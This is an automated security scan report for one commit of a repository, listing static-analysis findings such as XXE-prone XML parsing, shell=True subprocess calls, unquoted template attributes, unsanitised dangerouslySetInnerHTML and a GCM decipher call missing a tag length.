<< Back to security report
Repositoryfrankxai/arcanea →
Commit68d9754 →
VerdictFAIL
Score0
DateMay 22, 2026
| Severity | Rule | Message | File:Line |
|---|---|---|---|
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/docx/ooxml/scripts/validation/redlining.py:32 → |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/docx/ooxml/scripts/validation/redlining.py:84 → |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/docx/ooxml/scripts/validation/redlining.py:32 → |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/docx/ooxml/scripts/validation/redlining.py:84 → |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/mcp-builder/scripts/evaluation.py:13 → |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/pptx/ooxml/scripts/validation/redlining.py:32 → |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/pptx/ooxml/scripts/validation/redlining.py:84 → |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/pptx/ooxml/scripts/validation/redlining.py:32 → |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/pptx/ooxml/scripts/validation/redlining.py:84 → |
| HIGH | python.lang.security.audit.subprocess-shell-true.subprocess-shell-true | Found 'subprocess' function 'Popen' with 'shell=True'. This is dangerous because this call will spawn the command using a shell process. Doing so propagates current shell settings and variables, which makes it much easier for a malicious actor to execute commands. Use 'shell=False' instead. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/webapp-testing/scripts/with_server.py:71 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:90 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:90 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:96 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:96 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:109 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:109 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:109 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:136 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:136 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:136 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:142 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:143 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:144 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:145 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:168 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:168 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:168 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:174 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:175 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:176 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:198 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:198 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:198 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:204 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:205 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:206 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:230 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:231 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:232 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:237 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:238 → |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected a unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:239 → |
| MEDIUM | typescript.react.security.audit.react-dangerouslysetinnerhtml.react-dangerouslysetinnerhtml | Detection of dangerouslySetInnerHTML from non-constant definition. This can inadvertently expose users to cross-site scripting (XSS) attacks if this comes from user-provided input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize your HTML. | frankxai/arcanea/v3-memory-unification-eaa143b9/apps/web/components/prompt-books/editor/MarkdownPreview.tsx:28 → |
| HIGH | javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length | The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries. | frankxai/arcanea/v3-memory-unification-eaa143b9/packages/auth/src/keystore/encrypted-file.ts:37 → |